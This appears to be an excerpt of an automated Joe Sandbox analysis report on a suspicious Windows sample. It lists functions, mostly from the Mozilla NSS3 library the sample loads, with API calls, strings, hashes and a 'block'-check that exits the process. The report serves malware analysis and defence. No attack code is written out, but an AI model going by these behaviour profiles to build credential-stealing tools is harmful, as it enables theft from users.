Part of subcall function 6C3CBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C3CBBFB
Part of subcall function 6C3CBB80: GetLastError.KERNEL32 ref: 6C3CBC03
Part of subcall function 6C3CBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C3CBC19
Part of subcall function 6C3CBB80: free.MOZGLUE(00000000), ref: 6C3CBC22

PR_NewCondVar.NSS3(?), ref: 6C4F9CF0
PR_NewPollableEvent.NSS3 ref: 6C4F9D03

Part of subcall function 6C4EF3B0: PR_CallOnce.NSS3(6C5414B0,6C4EF510), ref: 6C4EF3E6
Part of subcall function 6C4EF3B0: PR_CreateIOLayerStub.NSS3(6C54006C), ref: 6C4EF402
Part of subcall function 6C4EF3B0: PR_Malloc.NSS3(00000004), ref: 6C4EF416
Part of subcall function 6C4EF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C4EF42D
Part of subcall function 6C4EF3B0: PR_SetSocketOption.NSS3(?), ref: 6C4EF455
Part of subcall function 6C4EF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C4EF473

Part of subcall function 6C4A9890: TlsGetValue.KERNEL32(?,?,?,6C4A97EB), ref: 6C4A989E

EnterCriticalSection.KERNEL32(?), ref: 6C4F9D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C4F9DAF
_PR_CreateThread.NSS3(00000000,6C4F9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C4F9D9F

Part of subcall function 6C3CB3C0: TlsGetValue.KERNEL32 ref: 6C3CB403
Part of subcall function 6C3CB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C3CB459

_PR_CreateThread.NSS3(00000000,6C4FA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C4F9DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C4F9DFC
_PR_CreateThread.NSS3(00000000,6C4FA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C4F9E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C4F9E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C4F9E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C4F9E89

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 6f20ee45227d92e3e3b791c8bbff71a117599c2828378dd80907c8774b3d9cb5
Instruction ID: e8e8456beec955be3107404ff67fb37141eb5927b6425d8665403c6724da7519
Opcode Fuzzy Hash: 6f20ee45227d92e3e3b791c8bbff71a117599c2828378dd80907c8774b3d9cb5
Instruction Fuzzy Hash: 54615CB1A00706AFD715DF75C844E67BBE8FF58209B04452DE869C7B50E731E815CBA2

Function 6C438E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C438E01,00000000,6C439060,6C540B64), ref: 6C438E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C438E01,00000000,6C439060,6C540B64), ref: 6C438E9E
PORT_ArenaAlloc_Util.NSS3(6C540B64,00000001,?,?,?,?,6C438E01,00000000,6C439060,6C540B64), ref: 6C438EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C438E01,00000000,6C439060,6C540B64), ref: 6C438EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C438E01,00000000,6C439060,6C540B64), ref: 6C438ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C438E01,00000000,6C439060,6C540B64), ref: 6C438EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C438E01), ref: 6C438EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C540B64,6C540B64), ref: 6C438F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C438F3F

Part of subcall function 6C43A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C43A421,00000000,00000000,6C439826), ref: 6C43A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C43904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C438E76

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 9ef110490e099aad70aeaaf6b28fdc52e1472aab89c5e6410423c00a238da1f2
Instruction ID: e450fdeb1fb3793ffebf4cd30ac6637d562c6d6c10033246260cc7213262e116
Opcode Fuzzy Hash: 9ef110490e099aad70aeaaf6b28fdc52e1472aab89c5e6410423c00a238da1f2
Instruction Fuzzy Hash: A06180B5D002159BDB10CF56CC80EABB7B5EFD8359F144129DC28A7741EB36A916CBE0

Function 006256FF Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00629377), ref: 00625714
ExitProcess.KERNEL32 ref: 0062571F
strtok_s.MSVCRT ref: 00625730

Strings

block, xrefs: 00625708

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: c8691a643cc293dbd069907fb4b89bf32a15ea293b223afd69554e7ec94be238
Instruction ID: 9667f46cc062675243c997ab0ecc3a3a3db262c5a4017d1d48e52bb59192d888
Opcode Fuzzy Hash: c8691a643cc293dbd069907fb4b89bf32a15ea293b223afd69554e7ec94be238
Instruction Fuzzy Hash: C9416670A54F26FFCB505F72BC499A67B6ABB01749B144435E603E2550E778E610CF90

Function 6C4ACD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C4ACC7B), ref: 6C4ACD7A

Part of subcall function 6C4ACE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C41C1A8,?), ref: 6C4ACE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C4ACDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C4ACDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C4ACDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C4ACD8E

Part of subcall function 6C3D05C0: PR_EnterMonitor.NSS3 ref: 6C3D05D1
Part of subcall function 6C3D05C0: PR_ExitMonitor.NSS3 ref: 6C3D05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C4ACDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C4ACDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C4ACE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C4ACE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C4ACE48

Strings

getnameinfo, xrefs: 6C4ACDB2, 6C4ACE23
ws2_32.dll, xrefs: 6C4ACD75
getaddrinfo, xrefs: 6C4ACD88, 6C4ACDF9
freeaddrinfo, xrefs: 6C4ACD9F, 6C4ACE10
wship6.dll, xrefs: 6C4ACDE3

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 7d38280616bcb05779c0af6ede8c2ebb2b2bc6c14ffeb52ec0d9575c4f7da6a9
Instruction ID: 2fa3ce6dc406cea369ae620049acd8ab43ad889723336be47d9c7d3734f9851b
Opcode Fuzzy Hash: 7d38280616bcb05779c0af6ede8c2ebb2b2bc6c14ffeb52ec0d9575c4f7da6a9
Instruction Fuzzy Hash: 0911E7E6E1721062EB01B6F56C04E9F39695B2260EF194534E809D5F00FB12D51AC6EF

Function 6C4F1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C4F13BC,?,?,?,6C4F1193), ref: 6C4F1C6B
PR_NewLock.NSS3(?,6C4F1193), ref: 6C4F1C7E

Part of subcall function 6C4A98D0: calloc.MOZGLUE(00000001,00000084,6C3D0936,00000001,?,6C3D102C), ref: 6C4A98E5

PR_NewCondVar.NSS3(00000000,?,6C4F1193), ref: 6C4F1C91

Part of subcall function 6C3CBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C3D21BC), ref: 6C3CBB8C

PR_NewCondVar.NSS3(00000000,?,?,6C4F1193), ref: 6C4F1CA7

Part of subcall function 6C3CBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C3CBBEB
Part of subcall function 6C3CBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C3CBBFB
Part of subcall function 6C3CBB80: GetLastError.KERNEL32 ref: 6C3CBC03
Part of subcall function 6C3CBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C3CBC19
Part of subcall function 6C3CBB80: free.MOZGLUE(00000000), ref: 6C3CBC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C4F1193), ref: 6C4F1CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C4F1193), ref: 6C4F1CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C4F1193), ref: 6C4F1CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C4F1193), ref: 6C4F1D1A

Part of subcall function 6C4A9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C3D1A48), ref: 6C4A9BB3
Part of subcall function 6C4A9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C3D1A48), ref: 6C4A9BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C4F1193), ref: 6C4F1D3D

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C4F1193), ref: 6C4F1D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C4F1193), ref: 6C4F1D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C4F1193), ref: 6C4F1D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C4F1193), ref: 6C4F1D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C4F1193), ref: 6C4F1D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C4F1193), ref: 6C4F1D93
PR_DestroyLock.NSS3(00000000,?,?,6C4F1193), ref: 6C4F1D9F
free.MOZGLUE(00000000,?,6C4F1193), ref: 6C4F1DA8

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: ce499aa1abc6f36e34518589649a34d50a8a0d97fd1c020eef051b0d1ab52dc8
Instruction ID: 171bc065827618cf95d732afb0bc84741490762904b4833a23cbc50737ca7f3e
Opcode Fuzzy Hash: ce499aa1abc6f36e34518589649a34d50a8a0d97fd1c020eef051b0d1ab52dc8
Instruction Fuzzy Hash: 8331A3F1E007015BEB20DF64AC41E5B7AF8AF5161DB044539E85A86B41FB32F419CBA3

Function 6C450C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,El), ref: 6C450C81

Part of subcall function 6C43BE30: SECOID_FindOID_Util.NSS3(6C3F311B,00000000,?,6C3F311B,?), ref: 6C43BE44

Part of subcall function 6C428500: SECOID_GetAlgorithmTag_Util.NSS3(6C4295DC,00000000,00000000,00000000,?,6C4295DC,00000000,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C428517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C450CC4

Part of subcall function 6C43FAB0: free.MOZGLUE(?,-00000001,?,?,6C3DF673,00000000,00000000), ref: 6C43FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C450CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C450D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C450D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C450D7D
free.MOZGLUE(00000000), ref: 6C450DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C450DC1
free.MOZGLUE(00000000), ref: 6C450DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C450E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C450E0F

Part of subcall function 6C4295C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C4295E0
Part of subcall function 6C4295C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C4295F5
Part of subcall function 6C4295C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C429609
Part of subcall function 6C4295C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C42961D
Part of subcall function 6C4295C0: PK11_GetInternalSlot.NSS3 ref: 6C42970B
Part of subcall function 6C4295C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C429756
Part of subcall function 6C4295C0: PK11_GetIVLength.NSS3(?), ref: 6C429767
Part of subcall function 6C4295C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C42977E
Part of subcall function 6C4295C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C42978E

Strings

-$El, xrefs: 6C450C64
*,El, xrefs: 6C450DCC
*,El, xrefs: 6C450C69, 6C450DE0, 6C450C80, 6C450C8B, 6C450CAF

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,El$*,El$-$El
API String ID: 3136566230-331358924
Opcode ID: 19f4e462499fdaf1b2f4b97d8823a001d862f93300122c0bd325bdc5a1eddbd1
Instruction ID: 9dd513d7ceab77931a60a1937dae47dfe7d32a4860f02c2f1a304599c57d192f
Opcode Fuzzy Hash: 19f4e462499fdaf1b2f4b97d8823a001d862f93300122c0bd325bdc5a1eddbd1
Instruction Fuzzy Hash: 6841D1B5901255ABEB00DF65DC41FAF7674EF0430DF500028ED195BB41E735AA28CBE2

Function 6C445CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C445EC0,00000000,?,?), ref: 6C445CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C445CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C445CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C445D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C445EC0,00000000,?,?), ref: 6C445D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C445D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C445D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C445D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C445D80

Strings

dbm:, xrefs: 6C445D03, 6C445D60
sql:, xrefs: 6C445CD1, 6C445D36
NSS_DEFAULT_DB_TYPE, xrefs: 6C445D1A
multiaccess:, xrefs: 6C445CB8
extern:, xrefs: 6C445CEA, 6C445D4B

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 387012746e64bcef126345584ce86585243683649c316965d951015d2fe4674b
Instruction ID: fd99e21d49a7ce09b3cfc105ca9b6e16efebe9a6df7f560e5275502e7b96f973
Opcode Fuzzy Hash: 387012746e64bcef126345584ce86585243683649c316965d951015d2fe4674b
Instruction Fuzzy Hash: 2E31E2F0645351ABFF129A24CC48F6A33A8EF0234AF348130ED99E6BC1F765E515C295

Function 6C446CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C511DE0,?), ref: 6C446CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C446D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C446D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C446D82
DER_GetInteger_Util.NSS3(?), ref: 6C446DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C446DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C446E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C446F19
PK11_DigestBegin.NSS3(00000000), ref: 6C446F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C446F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C447011
PK11_FreeSymKey.NSS3(00000000), ref: 6C447033
free.MOZGLUE(?), ref: 6C44703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C447060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C447087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C4470AF

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 9bb70e70751b6ea4ff4636f72f80042d871e632e3892f79309e997f52342dc5d
Instruction ID: d0cd5c9ae22bfb37458da3341364864ed748a6c2915d2c7ba46d0b9360d313cb
Opcode Fuzzy Hash: 9bb70e70751b6ea4ff4636f72f80042d871e632e3892f79309e997f52342dc5d
Instruction Fuzzy Hash: 7EA1C2B19492009BFB00DB24DC45FEA32A5DB8130DF34C93DE959CAB81E775D84A8793

Function 6C402C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?@l,?,6C3FE477,?,?,?,00000001,00000000,?,?,6C403F23,?), ref: 6C402C62
EnterCriticalSection.KERNEL32(0000001C,?,6C3FE477,?,?,?,00000001,00000000,?,?,6C403F23,?), ref: 6C402C76
PL_HashTableLookup.NSS3(00000000,?,?,6C3FE477,?,?,?,00000001,00000000,?,?,6C403F23,?), ref: 6C402C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C3FE477,?,?,?,00000001,00000000,?,?,6C403F23,?), ref: 6C402C93

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C3FE477,?,?,?,00000001,00000000,?,?,6C403F23,?), ref: 6C402CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C3FE477,?,?,?,00000001,00000000,?,?,6C403F23,?), ref: 6C402CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C3FE477,?,?,?,00000001,00000000,?,?,6C403F23), ref: 6C402CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C3FE477,?,?,?,00000001,00000000,?), ref: 6C402CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C3FE477,?,?,?,00000001,00000000,?), ref: 6C402D4D
EnterCriticalSection.KERNEL32(?), ref: 6C402D61
PL_HashTableLookup.NSS3(?,?), ref: 6C402D71
PR_Unlock.NSS3(?), ref: 6C402D7E

Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07AD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07CD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07D6
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C36204A), ref: 6C3D07E4
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,6C36204A), ref: 6C3D0864
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3D0880
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C36204A), ref: 6C3D08CB
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08D7
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08FB

Strings

#?@l, xrefs: 6C402C43

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

